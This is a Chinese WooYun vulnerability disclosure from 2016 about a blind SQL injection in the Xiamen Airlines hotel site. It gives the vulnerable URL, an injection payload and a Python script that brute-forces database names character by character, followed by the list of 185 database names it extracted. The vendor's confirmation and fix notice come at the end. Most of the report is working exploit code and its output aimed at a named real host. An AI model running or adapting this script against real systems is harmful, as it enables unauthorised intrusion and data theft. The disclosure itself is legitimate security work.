当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186144

漏洞标题:厦航某站SQL盲注(附验证脚本)

相关厂商:xiamenair.com

漏洞作者: Blcat

提交时间:2016-03-18 12:34

修复时间:2016-05-05 10:12

公开时间:2016-05-05 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

我一直觉得厦航很良心,因为每次都能喝到椰子汁,科科

详细说明:

注入点:

http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428


注入点imgKey
但是关键字被过滤,而且有安全狗和360webscan,好奇为啥要装全家桶
验证脚本:

#!/usr/bin/env python
# coding: UTF-8 (๑•̀ㅂ•́)و✧
__author__ = 'T1m0n'
# http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428' AND SUBSTRING(@@version,1,1)='i' and '1'='1
import httplib
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'User-Agent': 'Mozilla / 5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0',
    'Host': 'www.xmairhotels.com'
}
# db = []
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.-*'
for db_number in range(0, 185):
    db_name = ''
    flag = True
    for i in xrange(1, 29):
        if flag:
            for payload in payloads:
                poc = "SUBSTRING(db_name(%d),%d,1)='%s'" % (db_number, i, payload)
                url = "/admin/ImageShow.asp?imgKey=20100119155428%27%20AND%20" + poc + "%20and%20%271%27=%271"
                conn = httplib.HTTPConnection('www.xmairhotels.com')
                conn.request('GET', url, None, headers)
                text = conn.getresponse().read()
                conn.close()
                print '.',
                if len(text) > 224:
                    print payload
                    db_name += payload
                    break
                if payload == '*':
                    flag = False
                    print db_name
                    with open('db_name.txt', 'a+') as file:
                        file.write(db_name + '\n')
print 'Down'


漏洞证明:

@@version

# version microsoftsqlserver2000


db_name() 一共185张表,里面不会是开房记录吧好可怕好可怕

797728
master
tempdb
model
msdb
pubs
1008084
1003913
1003867
1003860
1003836
1003804
1003611
1003590
1003483
1003448
1003447
1003268
1003206
1003190
1002721
1002699
1002472
1001000
1000762
815750
804493
a1681
800499
800075
799151
796717
797728
796975
796611
788453
774884
759806
784992
784148
779597
769819
1004063
1004104
1004168
1004172
1004182
1004206
1004209
1004210
1004223
1004265
1004363
1004392
1004428
1004429
1004430
1004482
1004511
1004530
1004563
1004591
1004593
1004597
1004604
1004620
1004627
1004660
1004719
1004894
1005422
1008085
1003028
1003463
a3587
1005781
1006702
1006747
1006901
1007365
1007376
1007383
1007530
1007560
1007561
1007585
1007586
1007637
1007694
1007731
1007784
1007834
1007858
1007869
1007895
1007959
1008035
1008039
1008053
1008062
1008065
1008068
1008079
1008090
1008125
1008146
1008148
1008150
1008177
1008205
1008429
1008336
1008359
1008436
1008366
1008578
1008605
1008677
1008686
1008693
1008759
1008790
1008796
1008797
1008806
1008817
1008832
1008841
1008848
1008936
1008997
1009024
1009064
1009079
1009087
1009237
1009251
1009253
1009276
1009472
1009518
1009560
1009587
1009716
1009811
1009845
1009963
1009998
1010028
1010087
1010088
1010115
1010123
1010132
1010157
1010216
1010241
1010286
1010371
freehost
1010381
1010450
1010494
1010729
1010844
1010898
1010899
1010922
1011330
1011575
1011658
1011805
1012033
1012098
1012296
1012299
1012309
1012315
1012493
1012609
1012667
1012849
1012963
1013057

修复方案:

别再装全家桶了,改改代码过滤过滤吧

版权声明:转载请注明来源 Blcat@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-03-21 10:12

厂商回复:

感谢对厦航信息安全工作的支持。

最新状态:

2016-03-21:感谢您对厦航信息安全的关注,目前该漏洞已经整改完毕。